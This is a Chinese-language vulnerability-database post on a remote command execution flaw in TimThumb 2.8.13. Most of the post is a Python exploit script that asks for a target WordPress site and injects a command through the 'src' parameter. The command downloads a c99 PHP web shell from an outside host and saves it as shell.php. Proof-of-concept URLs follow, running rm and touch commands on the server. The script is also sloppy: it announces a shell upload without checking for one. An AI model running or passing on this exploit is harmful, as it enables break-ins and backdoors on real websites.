TimThumb 2.8.13 RCE远程命令执行漏洞
- 发表于
- Vulndb
timthumb.php <= 2.8.13 WebShot 'src'参数远程命令执行漏洞,这是一个之前的漏洞。TimThumb最新版是2.8.14,但很多程序都在使用小于该版本的文件,导致依然存在大量漏洞。记录一下。
TimThumb exp
# [+] TimThumb <= 2.8.13 Exploit
# ============================================================
# http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://<wp-website>$(<os-cmds>)
import os,sys,urllib2
os.system('clear')
def banner():
print '''
-- UrduSecurity Exploits --
--TimThumb 2.8.13 Remote Code Execution --
-- Author: Muhammad Adeel --
-- blog: http://urduSecurity.blogspot.com\n\n'''
def usage():
print '''
-- Usage: python UrduSecurity-Exploit.py --\n'''
banner()
usage()
host = raw_input('Enter Target Host[anything.com]: ')
theme = raw_input('Theme Name[parallax or any which you find]: ')
def getShell():
prepayload = urllib2.urlencode('http://'+host+'/wp-content/themes/'+theme+'/themify/img.php?webshot=1&src=http://'+host+'/$(wget http://www.c99php.com/shell/c99.txt; mv c99.txt shell.php)')
payload = urllib2.urlopen(prepayload)
print '\n'
while True:
try:
print "[+] Shell Uploaded! Find Your Shell in Theme Directory."
banner()
sys.exit()
except:
print 'Not Success, Might be site Patched.'
pass
getShell()
def main():
banner()
usage()
if __name__ == '__main__':
main()TimThumb poc
http://site.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://site.com/$(rm$IFS/tmp/a.txt)
http://site.com/wp-content/plugins/pluginX/timthumb.php??webshot=1&src=http://site.com/$(touch$IFS/tmp/a.txt)
原文连接:TimThumb 2.8.13 RCE远程命令执行漏洞
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
